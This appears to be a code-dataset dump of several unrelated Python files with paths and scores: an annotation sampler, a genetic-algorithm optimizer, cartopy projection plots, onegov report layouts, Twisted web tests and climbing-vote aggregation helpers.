df_sample = pd.DataFrame([], columns=sample_columns)
#return-> string: category name
def find_category(cat_id):
try:
return df_cats.name[df_cats.id == cat_id].values[0]
except:
return "no-catagory"
#return-> dict annoset counted as dataset
def get_dataset_counts(anno_set):
dataset_names = ['coco', 'objects365', 'oid', 'mvs']
anno_set_db = anno_set.groupby(['dataset_name']).count()
cols = [col for col in anno_set_db.columns if col not in ['dataset_name', 'id']]
anno_set_db = anno_set_db.drop(cols, axis=1)
anno_set_dbcount_dict = anno_set_db.to_dict()['id']
for dbname in dataset_names:
if(dbname not in anno_set_dbcount_dict.keys()):
anno_set_dbcount_dict[dbname] = 0
return anno_set_dbcount_dict
#drop mismatched columns and join two dataframe
df_joined = df_anno.set_index('image_id').join(df_images.set_index('id'))
for cat_id in tqdm_notebook(df_cats.id.values):
anno_set = df_joined[df_joined.category_id == cat_id]
db_count = get_dataset_counts(anno_set)
#increase the value for added annotations
limit = 200
db_quota = {'coco': 0, 'mvs': 0, 'objects365': 0, 'oid': 0}
df_sample = pd.DataFrame([], columns=sample_columns)
number_of_dataset=0
for x in db_count:
if(db_count[x] > 0):
number_of_dataset += 1
quota_foreach_db = int(limit / number_of_dataset)
for a in tqdm_notebook(anno_set.itertuples()):
if(db_quota[a.dataset_name] < quota_foreach_db):
df_a = pd.DataFrame([a])
df_a = df_a.rename(columns={"Index": "image_id"})
df_a['category_name'] = find_category(df_a['category_id'].values[0])
#df_a = df_a.set_index('Index', drop=True)
df_sample = df_sample.append(df_a)
db_quota[a.dataset_name]+=1
df_sample = df_sample.reset_index(drop=True) | scripts/dataset_sampler/json_sampler_v1_saved.py | from tqdm import tqdm
import pandas as pd
import numpy as np
import os
os.chdir("/media/data/bderinbay/rvc_devkit/datasets/json_file/")
df_cats = pd.read_csv('categories.csv')
df_images = pd.read_csv('images.csv')
df_anno = pd.read_csv('annotations.csv')
sample_columns = ['image_id','bbox','category_id', 'category_name', 'file_name', 'height', 'width','ds_id']
df_sample = pd.DataFrame([], columns=sample_columns)
#return-> string: category name
def find_category(cat_id):
try:
return df_cats.name[df_cats.id == cat_id].values[0]
except:
return "no-catagory"
#return-> dict annoset counted as dataset
def get_dataset_counts(anno_set):
dataset_names = ['coco', 'objects365', 'oid', 'mvs']
anno_set_db = anno_set.groupby(['dataset_name']).count()
cols = [col for col in anno_set_db.columns if col not in ['dataset_name', 'id']]
anno_set_db = anno_set_db.drop(cols, axis=1)
anno_set_dbcount_dict = anno_set_db.to_dict()['id']
for dbname in dataset_names:
if(dbname not in anno_set_dbcount_dict.keys()):
anno_set_dbcount_dict[dbname] = 0
return anno_set_dbcount_dict
#drop mismatched columns and join two dataframe
df_joined = df_anno.set_index('image_id').join(df_images.set_index('id'))
for cat_id in tqdm_notebook(df_cats.id.values):
anno_set = df_joined[df_joined.category_id == cat_id]
db_count = get_dataset_counts(anno_set)
#increase the value for added annotations
limit = 200
db_quota = {'coco': 0, 'mvs': 0, 'objects365': 0, 'oid': 0}
df_sample = pd.DataFrame([], columns=sample_columns)
number_of_dataset=0
for x in db_count:
if(db_count[x] > 0):
number_of_dataset += 1
quota_foreach_db = int(limit / number_of_dataset)
for a in tqdm_notebook(anno_set.itertuples()):
if(db_quota[a.dataset_name] < quota_foreach_db):
df_a = pd.DataFrame([a])
df_a = df_a.rename(columns={"Index": "image_id"})
df_a['category_name'] = find_category(df_a['category_id'].values[0])
#df_a = df_a.set_index('Index', drop=True)
df_sample = df_sample.append(df_a)
db_quota[a.dataset_name]+=1
df_sample = df_sample.reset_index(drop=True) | 0.174551 | 0.157008 |
import numpy as np
class BaseGenetics(object):
def __init__(self, e=None):
self.estimator = None
self.expectations = e # vector of math expectations for each component
def set_estimator(self, f):
def g(*args, **kwargs):
return f(*args, **kwargs)
self.estimator = g
def generate_population(self, qmin, qmax, h, m):
"""
Generate population.
(real, real, int, int) -> [h x m] np.array of reals
"""
population = {}
e = self.expectations
if e:
functional = self.estimate_object_function(e)
population[functional] = e
while len(population) < h:
candidate = np.random.normal(e, 0.03)
functional = self.estimate_object_function(candidate)
if functional < 1e+3: population[functional] = candidate
else:
while len(population) < h:
candidate = np.random.uniform(qmin, qmax, m)
functional = self.estimate_object_function(candidate)
if functional < 1e+3: population[functional] = candidate
return population
def estimate_object_function(self, q):
"""
Evaluates function self.estimator with q as an incoming parameter
(vector) -> real
"""
return self.estimator(q)
def get_best_individual(self, population, worst=False, ksearch=None):
"""
Return best or worst individual:
1) if ksearch != None and worst==False: return best individual
from ksearch random sample without replacement.
2) if ksearch == None and worst==True: return index of the worst
individual from the whole population.
(2d array of real, bool, int) -> array of real OR int
"""
population_estimates = np.array(list(population.keys()))
if ksearch and not worst:
try:
subpopulation_estimates = population_estimates[np.random.choice(population_estimates.shape[0], ksearch, replace=False)]
individual_estimate = subpopulation_estimates.min()
return (population[individual_estimate], individual_estimate)
except ValueError as e: print('Wrong type for ksearch: {0}'.format(e))
else:
best_estimate = population_estimates.min()
return (population[best_estimate], best_estimate)
def cross(self, population, ksearch):
"""
Processes crossover of some individuals.
(array of array of reals, int) -> (array of real, array of real) OR None
"""
best_individual, best_value = self.get_best_individual(population)
if len(best_individual) > 1:
parent1, parent1_est = self.get_best_individual(population, worst=False, ksearch=ksearch)
parent2, parent2_est = self.get_best_individual(population, worst=False, ksearch=ksearch)
if np.max([best_value/parent1_est, best_value/parent2_est])>np.random.uniform():
crossover_point = np.random.randint(1, len(parent1) - 1)
child1 = np.hstack((parent1[:crossover_point], parent2[crossover_point:]))
child2 = np.hstack((parent2[:crossover_point], parent1[crossover_point:]))
return (child1, child2)
else: return None
elif len(best_individual) == 1: return (best_individual[:], best_individual[:])
else: print('fuck you')
def mutate(self, children, qmin, qmax, p=1):
"""
Mutate given child1 and child2 with probability 'p'.
(array of real, array of real, real, real, real) -> None
"""
if np.random.rand() < p:
mutated_children = {}
for child in children:
child_gene = np.random.randint(child.shape[0])
child[child_gene] = np.random.uniform(qmin, qmax)
child_functional = self.estimate_object_function(child)
mutated_children[child_functional] = child
return mutated_children
else: return None
def insert_children(self, population, children):
"""
Replace the worst individuals with children, if they fit better.
(2d array of real, array of real, array of real) -> None
"""
merge = {**children, **population}
k = len(children)
estimates = list(merge.keys()) # unique estimates
bad_k = np.partition(estimates, k)[-k:]
for e in bad_k: del merge[e]
return merge
# psi_change_epoch <= individuals
# ksearch <= individuals
# variations_per_individuals >= 1
# g > 0
# crossings > 0
def optimize(self, qmin=1, qmax=4, individuals=1000, generations=10,
individual_len=3, crossings=256, ksearch=16):
print('Generating population for parametric optimization...')
population = self.generate_population(qmin, qmax, individuals, individual_len)
for g in range(generations):
for c in range(crossings):
children = self.cross(population, ksearch)
if children:
children = self.mutate(children, qmin, qmax)
population = self.insert_children(population, children)
if len(population) <= ksearch:
print('Population died out!')
best_individual, best_value = self.get_best_individual(population)
print('J: {0}, Q: {1}'.format(best_value, best_individual))
return best_individual, best_value
else: continue
best_individual, best_value = self.get_best_individual(population)
print('J: {0}, Q: {1}'.format(best_value, best_individual))
return best_individual, best_value
if __name__=='__main__':
estimator = lambda q: np.linalg.norm(np.array([1,2,3]) - q)
go = BaseGenetics()
go.set_estimator(estimator)
go.optimize() | synthesis_repo/genetic_opt.py | import numpy as np
class BaseGenetics(object):
def __init__(self, e=None):
self.estimator = None
self.expectations = e # vector of math expectations for each component
def set_estimator(self, f):
def g(*args, **kwargs):
return f(*args, **kwargs)
self.estimator = g
def generate_population(self, qmin, qmax, h, m):
"""
Generate population.
(real, real, int, int) -> [h x m] np.array of reals
"""
population = {}
e = self.expectations
if e:
functional = self.estimate_object_function(e)
population[functional] = e
while len(population) < h:
candidate = np.random.normal(e, 0.03)
functional = self.estimate_object_function(candidate)
if functional < 1e+3: population[functional] = candidate
else:
while len(population) < h:
candidate = np.random.uniform(qmin, qmax, m)
functional = self.estimate_object_function(candidate)
if functional < 1e+3: population[functional] = candidate
return population
def estimate_object_function(self, q):
"""
Evaluates function self.estimator with q as an incoming parameter
(vector) -> real
"""
return self.estimator(q)
def get_best_individual(self, population, worst=False, ksearch=None):
"""
Return best or worst individual:
1) if ksearch != None and worst==False: return best individual
from ksearch random sample without replacement.
2) if ksearch == None and worst==True: return index of the worst
individual from the whole population.
(2d array of real, bool, int) -> array of real OR int
"""
population_estimates = np.array(list(population.keys()))
if ksearch and not worst:
try:
subpopulation_estimates = population_estimates[np.random.choice(population_estimates.shape[0], ksearch, replace=False)]
individual_estimate = subpopulation_estimates.min()
return (population[individual_estimate], individual_estimate)
except ValueError as e: print('Wrong type for ksearch: {0}'.format(e))
else:
best_estimate = population_estimates.min()
return (population[best_estimate], best_estimate)
def cross(self, population, ksearch):
"""
Processes crossover of some individuals.
(array of array of reals, int) -> (array of real, array of real) OR None
"""
best_individual, best_value = self.get_best_individual(population)
if len(best_individual) > 1:
parent1, parent1_est = self.get_best_individual(population, worst=False, ksearch=ksearch)
parent2, parent2_est = self.get_best_individual(population, worst=False, ksearch=ksearch)
if np.max([best_value/parent1_est, best_value/parent2_est])>np.random.uniform():
crossover_point = np.random.randint(1, len(parent1) - 1)
child1 = np.hstack((parent1[:crossover_point], parent2[crossover_point:]))
child2 = np.hstack((parent2[:crossover_point], parent1[crossover_point:]))
return (child1, child2)
else: return None
elif len(best_individual) == 1: return (best_individual[:], best_individual[:])
else: print('fuck you')
def mutate(self, children, qmin, qmax, p=1):
"""
Mutate given child1 and child2 with probability 'p'.
(array of real, array of real, real, real, real) -> None
"""
if np.random.rand() < p:
mutated_children = {}
for child in children:
child_gene = np.random.randint(child.shape[0])
child[child_gene] = np.random.uniform(qmin, qmax)
child_functional = self.estimate_object_function(child)
mutated_children[child_functional] = child
return mutated_children
else: return None
def insert_children(self, population, children):
"""
Replace the worst individuals with children, if they fit better.
(2d array of real, array of real, array of real) -> None
"""
merge = {**children, **population}
k = len(children)
estimates = list(merge.keys()) # unique estimates
bad_k = np.partition(estimates, k)[-k:]
for e in bad_k: del merge[e]
return merge
# psi_change_epoch <= individuals
# ksearch <= individuals
# variations_per_individuals >= 1
# g > 0
# crossings > 0
def optimize(self, qmin=1, qmax=4, individuals=1000, generations=10,
individual_len=3, crossings=256, ksearch=16):
print('Generating population for parametric optimization...')
population = self.generate_population(qmin, qmax, individuals, individual_len)
for g in range(generations):
for c in range(crossings):
children = self.cross(population, ksearch)
if children:
children = self.mutate(children, qmin, qmax)
population = self.insert_children(population, children)
if len(population) <= ksearch:
print('Population died out!')
best_individual, best_value = self.get_best_individual(population)
print('J: {0}, Q: {1}'.format(best_value, best_individual))
return best_individual, best_value
else: continue
best_individual, best_value = self.get_best_individual(population)
print('J: {0}, Q: {1}'.format(best_value, best_individual))
return best_individual, best_value
if __name__=='__main__':
estimator = lambda q: np.linalg.norm(np.array([1,2,3]) - q)
go = BaseGenetics()
go.set_estimator(estimator)
go.optimize() | 0.604516 | 0.599778 |
def xyz2ll(x,y,z):
i_r = 1/numpy.sqrt(x*x + y*y + z*z)
sinlat = z*i_r
recip_coslat = 1/numpy.sqrt(1 - sinlat**2)
sinlon = (y*i_r)*recip_coslat
coslon = (x*i_r)*recip_coslat
rad2deg = 180/numpy.pi
lat = numpy.arcsin(sinlat)*rad2deg
sgn = numpy.maximum(numpy.sign(coslon),0)
lon0 = numpy.arcsin(sinlon)*rad2deg
lon1 = 180-numpy.arcsin(sinlon)*rad2deg
return (1-sgn)*lon1+sgn*lon0,lat
def ll2xyz(lon,lat):
deg2rad = numpy.pi/180
coslat = numpy.cos(deg2rad*lat)
return coslat*numpy.cos(deg2rad*lon), coslat*numpy.sin(deg2rad*lon), numpy.sin(deg2rad*lat)
def roty(x,y,z,a):
deg2rad = numpy.pi/180
ca,sa = numpy.cos(deg2rad*a), numpy.sin(deg2rad*a)
return ca*x-sa*z,y,ca*z+sa*x
def rotz(x,y,z,a):
deg2rad = numpy.pi/180
ca,sa = numpy.cos(deg2rad*a), numpy.sin(deg2rad*a)
return ca*x-sa*y,ca*y+sa*x,z
def drw_circles(subplot, projection, w=0.23, lw=3):
a = numpy.linspace(0,2*numpy.pi,32)
x,y,z=1,w*numpy.cos(a),w*numpy.sin(a)
ax=plt.subplot(subplot, projection=projection)
ax.plot(*xyz2ll(x,y,z),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*roty(x,y,z,60)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*roty(x,y,z,-60)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*rotz(x,y,z,60)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*rotz(x,y,z,-60)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*rotz(x,y,z,-120)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*rotz(x,y,z,120)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot([-180,180,0,0],[0,0,89,-89],'w.',transform=cartopy.crs.PlateCarree())
drw_lines(ax)
ax.coastlines()
def drw_lines(ax, lon0=-70, lat0=-70, lon1=70, lat1=70, lw=2, ls='--', np=64):
# Straight line in lat-lon space
lons, lats = numpy.linspace(lon0, lon1, np), numpy.linspace(lat0, lat1, np)
ax.plot(lons,lats,ls,transform=cartopy.crs.PlateCarree(),linewidth=lw)
# Straight line in Mercator
x0,y0 = cartopy.crs.Mercator().transform_point(lon0,lat0,cartopy.crs.PlateCarree())
x1,y1 = cartopy.crs.Mercator().transform_point(lon1,lat1,cartopy.crs.PlateCarree())
xs, ys = numpy.linspace(x0, x1, np), numpy.linspace(y0, y1, np)
ax.plot(xs,ys,ls,transform=cartopy.crs.Mercator(),linewidth=lw)
# Straight line in NearsidePerspective
x0,y0,z0 = ll2xyz(lon0,lat0)
x1,y1,z1 = ll2xyz(lon1,lat1)
a = numpy.linspace(0,1,np)
lons,lats = xyz2ll(x0 + (x1-x0)*a, y0 + (y1-y0)*a, z0 + (z1-z0)*a)
ax.plot(lons,lats,ls,transform=cartopy.crs.PlateCarree(),linewidth=lw)
plt.figure(figsize=(10,10))
drw_circles(221, cartopy.crs.NearsidePerspective() ); plt.title('1a) Perspective')
drw_circles(222, cartopy.crs.PlateCarree() ); plt.title('1b) Equirectangular (Plate-Carrée)')
drw_circles(223, cartopy.crs.Robinson() ); plt.title('1c) Robinson')
drw_circles(224, cartopy.crs.Mercator() ); plt.title('1d) Mercator')
plt.tight_layout() | figure-scripts/some-projections.py | def xyz2ll(x,y,z):
i_r = 1/numpy.sqrt(x*x + y*y + z*z)
sinlat = z*i_r
recip_coslat = 1/numpy.sqrt(1 - sinlat**2)
sinlon = (y*i_r)*recip_coslat
coslon = (x*i_r)*recip_coslat
rad2deg = 180/numpy.pi
lat = numpy.arcsin(sinlat)*rad2deg
sgn = numpy.maximum(numpy.sign(coslon),0)
lon0 = numpy.arcsin(sinlon)*rad2deg
lon1 = 180-numpy.arcsin(sinlon)*rad2deg
return (1-sgn)*lon1+sgn*lon0,lat
def ll2xyz(lon,lat):
deg2rad = numpy.pi/180
coslat = numpy.cos(deg2rad*lat)
return coslat*numpy.cos(deg2rad*lon), coslat*numpy.sin(deg2rad*lon), numpy.sin(deg2rad*lat)
def roty(x,y,z,a):
deg2rad = numpy.pi/180
ca,sa = numpy.cos(deg2rad*a), numpy.sin(deg2rad*a)
return ca*x-sa*z,y,ca*z+sa*x
def rotz(x,y,z,a):
deg2rad = numpy.pi/180
ca,sa = numpy.cos(deg2rad*a), numpy.sin(deg2rad*a)
return ca*x-sa*y,ca*y+sa*x,z
def drw_circles(subplot, projection, w=0.23, lw=3):
a = numpy.linspace(0,2*numpy.pi,32)
x,y,z=1,w*numpy.cos(a),w*numpy.sin(a)
ax=plt.subplot(subplot, projection=projection)
ax.plot(*xyz2ll(x,y,z),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*roty(x,y,z,60)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*roty(x,y,z,-60)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*rotz(x,y,z,60)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*rotz(x,y,z,-60)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*rotz(x,y,z,-120)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot(*xyz2ll(*rotz(x,y,z,120)),transform=cartopy.crs.PlateCarree(),linewidth=lw)
ax.plot([-180,180,0,0],[0,0,89,-89],'w.',transform=cartopy.crs.PlateCarree())
drw_lines(ax)
ax.coastlines()
def drw_lines(ax, lon0=-70, lat0=-70, lon1=70, lat1=70, lw=2, ls='--', np=64):
# Straight line in lat-lon space
lons, lats = numpy.linspace(lon0, lon1, np), numpy.linspace(lat0, lat1, np)
ax.plot(lons,lats,ls,transform=cartopy.crs.PlateCarree(),linewidth=lw)
# Straight line in Mercator
x0,y0 = cartopy.crs.Mercator().transform_point(lon0,lat0,cartopy.crs.PlateCarree())
x1,y1 = cartopy.crs.Mercator().transform_point(lon1,lat1,cartopy.crs.PlateCarree())
xs, ys = numpy.linspace(x0, x1, np), numpy.linspace(y0, y1, np)
ax.plot(xs,ys,ls,transform=cartopy.crs.Mercator(),linewidth=lw)
# Straight line in NearsidePerspective
x0,y0,z0 = ll2xyz(lon0,lat0)
x1,y1,z1 = ll2xyz(lon1,lat1)
a = numpy.linspace(0,1,np)
lons,lats = xyz2ll(x0 + (x1-x0)*a, y0 + (y1-y0)*a, z0 + (z1-z0)*a)
ax.plot(lons,lats,ls,transform=cartopy.crs.PlateCarree(),linewidth=lw)
plt.figure(figsize=(10,10))
drw_circles(221, cartopy.crs.NearsidePerspective() ); plt.title('1a) Perspective')
drw_circles(222, cartopy.crs.PlateCarree() ); plt.title('1b) Equirectangular (Plate-Carrée)')
drw_circles(223, cartopy.crs.Robinson() ); plt.title('1c) Robinson')
drw_circles(224, cartopy.crs.Mercator() ); plt.title('1d) Mercator')
plt.tight_layout() | 0.588534 | 0.646628 |
from cached_property import cached_property
from onegov.core.elements import Link
from onegov.wtfs import _
from onegov.wtfs.layouts.default import DefaultLayout
class ReportLayout(DefaultLayout):
@cached_property
def title(self):
return _("Report")
@cached_property
def breadcrumbs(self):
return [
Link(_("Homepage"), self.homepage_url),
Link(self.title, self.request.link(self.model))
]
@cached_property
def dates(self):
return "{}-{}".format(
self.format_date(self.model.start, 'date'),
self.format_date(self.model.end, 'date')
)
class SpecificReportBaseLayout(DefaultLayout):
@cached_property
def subtitle(self):
return "{}-{}".format(
self.format_date(self.model.start, 'date'),
self.format_date(self.model.end, 'date')
)
@cached_property
def editbar_links(self):
result = []
result.append(
Link(
text=_("Print"),
url='#',
attrs={
'class': 'print-icon',
'onclick': 'window.print();return false;'
}
)
)
return result
@cached_property
def breadcrumbs(self):
return [
Link(_("Homepage"), self.homepage_url),
Link(_("Report"), self.report_url),
Link(self.title, "#"),
Link(self.subtitle, self.request.link(self.model)),
]
class ReportBoxesLayout(SpecificReportBaseLayout):
@cached_property
def title(self):
return _("Report boxes")
class ReportBoxesAndFormsLayout(SpecificReportBaseLayout):
@cached_property
def title(self):
return _("Report boxes and forms")
class ReportFormsByMunicipalityLayout(SpecificReportBaseLayout):
@cached_property
def title(self):
return _("Report forms")
@cached_property
def subtitle(self):
return "{} {}-{}".format(
self.model.municipality_name,
self.format_date(self.model.start, 'date'),
self.format_date(self.model.end, 'date')
)
class ReportFormsAllMunicipalitiesLayout(SpecificReportBaseLayout):
@cached_property
def title(self):
return _("Report forms of all municipalities")
class ReportBoxesAndFormsByDeliveryLayout(SpecificReportBaseLayout):
@cached_property
def title(self):
return _("Report boxes and forms by delivery")
@cached_property
def subtitle(self):
return "{} ({}) {}-{}".format(
self.model.municipality.name,
self.model.municipality.bfs_number,
self.format_date(self.model.start, 'date'),
self.format_date(self.model.end, 'date')
) | src/onegov/wtfs/layouts/report.py | from cached_property import cached_property
from onegov.core.elements import Link
from onegov.wtfs import _
from onegov.wtfs.layouts.default import DefaultLayout
class ReportLayout(DefaultLayout):
@cached_property
def title(self):
return _("Report")
@cached_property
def breadcrumbs(self):
return [
Link(_("Homepage"), self.homepage_url),
Link(self.title, self.request.link(self.model))
]
@cached_property
def dates(self):
return "{}-{}".format(
self.format_date(self.model.start, 'date'),
self.format_date(self.model.end, 'date')
)
class SpecificReportBaseLayout(DefaultLayout):
@cached_property
def subtitle(self):
return "{}-{}".format(
self.format_date(self.model.start, 'date'),
self.format_date(self.model.end, 'date')
)
@cached_property
def editbar_links(self):
result = []
result.append(
Link(
text=_("Print"),
url='#',
attrs={
'class': 'print-icon',
'onclick': 'window.print();return false;'
}
)
)
return result
@cached_property
def breadcrumbs(self):
return [
Link(_("Homepage"), self.homepage_url),
Link(_("Report"), self.report_url),
Link(self.title, "#"),
Link(self.subtitle, self.request.link(self.model)),
]
class ReportBoxesLayout(SpecificReportBaseLayout):
@cached_property
def title(self):
return _("Report boxes")
class ReportBoxesAndFormsLayout(SpecificReportBaseLayout):
@cached_property
def title(self):
return _("Report boxes and forms")
class ReportFormsByMunicipalityLayout(SpecificReportBaseLayout):
@cached_property
def title(self):
return _("Report forms")
@cached_property
def subtitle(self):
return "{} {}-{}".format(
self.model.municipality_name,
self.format_date(self.model.start, 'date'),
self.format_date(self.model.end, 'date')
)
class ReportFormsAllMunicipalitiesLayout(SpecificReportBaseLayout):
@cached_property
def title(self):
return _("Report forms of all municipalities")
class ReportBoxesAndFormsByDeliveryLayout(SpecificReportBaseLayout):
@cached_property
def title(self):
return _("Report boxes and forms by delivery")
@cached_property
def subtitle(self):
return "{} ({}) {}-{}".format(
self.model.municipality.name,
self.model.municipality.bfs_number,
self.format_date(self.model.start, 'date'),
self.format_date(self.model.end, 'date')
) | 0.778607 | 0.095898 |
import operator
from xml.etree import ElementTree as ET
import cStringIO as StringIO
import json
from twisted.trial import unittest
from twisted.internet import defer, tcp
from twisted.web import resource, server
from twisted.web.test import requesthelper
from reqpi.robot import hash as rrhash
from zope.interface import verify
def _render(resource, request):
result = resource.render(request)
if isinstance(result, str):
request.write(result)
request.finish()
return defer.succeed(None)
elif result is server.NOT_DONE_YET:
if request.finished:
return defer.succeed(None)
else:
return request.notifyFinish()
else:
raise ValueError("Unexpected return value: %r" % (result,))
class DummyStore(object):
def __init__(self):
self.stuffs = []
self.versions = {}
def add(self, stuff):
self.stuffs.append(stuff)
return 'hello'
def version(self, sha, name):
return self.versions[sha, name]
class HashTest(unittest.TestCase):
def setUp(self):
self.store = DummyStore()
self.locations = {}
def locate(*args):
return defer.maybeDeferred(operator.getitem, self.locations, args)
self.resource = rrhash.Hash(self.store, locate,
'http://testing.org:123')
def test_iface(self):
verify.verifyObject(resource.IResource, self.resource)
def test_leafiness(self):
self.assertTrue(self.resource.isLeaf)
with self.assertRaises(Exception):
self.resource.putChild('lala', None)
with self.assertRaises(Exception):
self.resource.getChildWithDefault(None, None)
def test_POST(self):
request = requesthelper.DummyRequest([''])
request.method = 'POST'
request.uri = '/robot/hash'
request.content = StringIO.StringIO(json.dumps(dict(requirements='')))
request.getHost = lambda: tcp.Port(1555, None)
d = _render(self.resource, request)
@d.addCallback
def handle(res):
self.assertEquals(res, None)
resp = json.loads(''.join(request.written))
url = resp.pop('url')
url, slug = url.rsplit('/', 1)
self.assertEquals(resp, {})
self.assertEquals(url, 'http://testing.org:123/robot/hash')
self.assertNotEquals(slug, '')
return d
def test_POST_without_baseurl(self):
def locate(*args):
return defer.maybeDeferred(operator.getitem, self.locations, args)
self.resource = rrhash.Hash(self.store, locate, baseurl=None)
request = requesthelper.DummyRequest([''])
request.method = 'POST'
request.uri = '/robot/hash'
request.content = StringIO.StringIO(json.dumps(dict(requirements='')))
request.getHost = lambda: tcp.Port(1555, None)
d = _render(self.resource, request)
@d.addCallback
def handle(res):
self.assertEquals(res, None)
resp = json.loads(''.join(request.written))
url = resp.pop('url')
url, slug = url.rsplit('/', 1)
self.assertEquals(resp, {})
self.assertEquals(url, 'http://dummy:1555/robot/hash')
self.assertNotEquals(slug, '')
return d
def test_no_OPTIONS(self):
request = requesthelper.DummyRequest([''])
request.method = 'OPTIONS'
with self.assertRaises(server.UnsupportedMethod):
_render(self.resource, request)
def test_GET_package(self):
self.store.versions['111', 'twisted'] = 'Twisted', '15.5'
self.locations['Twisted', '15.5'] = 'lalal/Twisted-15.5.tar.gz'
request = requesthelper.DummyRequest(['111', 'twisted', ''])
request.method = 'GET'
d = _render(self.resource, request)
@d.addCallback
def handle(res):
self.assertEquals(res, None)
html = ''.join(request.written)
parsed = ET.fromstring(html)
link, = parsed.iter('a')
href = link.attrib['href']
head, tail = href.rsplit('/', 1)
self.assertEquals(tail, 'Twisted-15.5.tar.gz')
return d
def test_bad_GET(self):
request = requesthelper.DummyRequest(['111', 'twisted'])
request.method = 'GET'
with self.assertRaises(NotImplementedError):
_render(self.resource, request)
def test_failed_GET_package(self):
self.store.versions['111', 'twisted'] = 'Twisted', '15.5'
request = requesthelper.DummyRequest(['111', 'twisted', ''])
request.method = 'GET'
d = _render(self.resource, request)
@d.addCallback
def handle(res):
self.assertEquals(res, None)
html = ''.join(request.written)
parsed = ET.fromstring(html)
self.assertEquals(list(parsed.iter('a')), [])
res = self.flushLoggedErrors()
self.assertEquals(len(res), 1)
return d | reqpi/test/test_robot/test_hash.py | import operator
from xml.etree import ElementTree as ET
import cStringIO as StringIO
import json
from twisted.trial import unittest
from twisted.internet import defer, tcp
from twisted.web import resource, server
from twisted.web.test import requesthelper
from reqpi.robot import hash as rrhash
from zope.interface import verify
def _render(resource, request):
result = resource.render(request)
if isinstance(result, str):
request.write(result)
request.finish()
return defer.succeed(None)
elif result is server.NOT_DONE_YET:
if request.finished:
return defer.succeed(None)
else:
return request.notifyFinish()
else:
raise ValueError("Unexpected return value: %r" % (result,))
class DummyStore(object):
def __init__(self):
self.stuffs = []
self.versions = {}
def add(self, stuff):
self.stuffs.append(stuff)
return 'hello'
def version(self, sha, name):
return self.versions[sha, name]
class HashTest(unittest.TestCase):
def setUp(self):
self.store = DummyStore()
self.locations = {}
def locate(*args):
return defer.maybeDeferred(operator.getitem, self.locations, args)
self.resource = rrhash.Hash(self.store, locate,
'http://testing.org:123')
def test_iface(self):
verify.verifyObject(resource.IResource, self.resource)
def test_leafiness(self):
self.assertTrue(self.resource.isLeaf)
with self.assertRaises(Exception):
self.resource.putChild('lala', None)
with self.assertRaises(Exception):
self.resource.getChildWithDefault(None, None)
def test_POST(self):
request = requesthelper.DummyRequest([''])
request.method = 'POST'
request.uri = '/robot/hash'
request.content = StringIO.StringIO(json.dumps(dict(requirements='')))
request.getHost = lambda: tcp.Port(1555, None)
d = _render(self.resource, request)
@d.addCallback
def handle(res):
self.assertEquals(res, None)
resp = json.loads(''.join(request.written))
url = resp.pop('url')
url, slug = url.rsplit('/', 1)
self.assertEquals(resp, {})
self.assertEquals(url, 'http://testing.org:123/robot/hash')
self.assertNotEquals(slug, '')
return d
def test_POST_without_baseurl(self):
def locate(*args):
return defer.maybeDeferred(operator.getitem, self.locations, args)
self.resource = rrhash.Hash(self.store, locate, baseurl=None)
request = requesthelper.DummyRequest([''])
request.method = 'POST'
request.uri = '/robot/hash'
request.content = StringIO.StringIO(json.dumps(dict(requirements='')))
request.getHost = lambda: tcp.Port(1555, None)
d = _render(self.resource, request)
@d.addCallback
def handle(res):
self.assertEquals(res, None)
resp = json.loads(''.join(request.written))
url = resp.pop('url')
url, slug = url.rsplit('/', 1)
self.assertEquals(resp, {})
self.assertEquals(url, 'http://dummy:1555/robot/hash')
self.assertNotEquals(slug, '')
return d
def test_no_OPTIONS(self):
request = requesthelper.DummyRequest([''])
request.method = 'OPTIONS'
with self.assertRaises(server.UnsupportedMethod):
_render(self.resource, request)
def test_GET_package(self):
self.store.versions['111', 'twisted'] = 'Twisted', '15.5'
self.locations['Twisted', '15.5'] = 'lalal/Twisted-15.5.tar.gz'
request = requesthelper.DummyRequest(['111', 'twisted', ''])
request.method = 'GET'
d = _render(self.resource, request)
@d.addCallback
def handle(res):
self.assertEquals(res, None)
html = ''.join(request.written)
parsed = ET.fromstring(html)
link, = parsed.iter('a')
href = link.attrib['href']
head, tail = href.rsplit('/', 1)
self.assertEquals(tail, 'Twisted-15.5.tar.gz')
return d
def test_bad_GET(self):
request = requesthelper.DummyRequest(['111', 'twisted'])
request.method = 'GET'
with self.assertRaises(NotImplementedError):
_render(self.resource, request)
def test_failed_GET_package(self):
self.store.versions['111', 'twisted'] = 'Twisted', '15.5'
request = requesthelper.DummyRequest(['111', 'twisted', ''])
request.method = 'GET'
d = _render(self.resource, request)
@d.addCallback
def handle(res):
self.assertEquals(res, None)
html = ''.join(request.written)
parsed = ET.fromstring(html)
self.assertEquals(list(parsed.iter('a')), [])
res = self.flushLoggedErrors()
self.assertEquals(len(res), 1)
return d | 0.5083 | 0.186576 |
from enum import Enum
from uuid import UUID
from pydantic.types import constr, conint
from app import create_api_router, VoteDefinition, VoteAggregation
def most_voted(mongo_votes):
values = dict()
for mongo_vote in mongo_votes:
if mongo_vote["value"] in values:
values[mongo_vote["value"]] += 1
else:
values[mongo_vote["value"]] = 1
return max(values, key=values.get, default=None)
def average(mongo_votes):
if len(mongo_votes) == 0:
return None
else:
return sum([mongo_vote["value"] for mongo_vote in mongo_votes]) / len(mongo_votes)
class ClimbType(str, Enum):
boulder = "boulder"
sport = "sport"
deep_water_solo = "deep_water_solo"
traditional = "traditional"
partially_bolted = "partially_bolted"
ice_or_mixed = "ice_or_mixed"
aid = "aid"
mountain = "mountain"
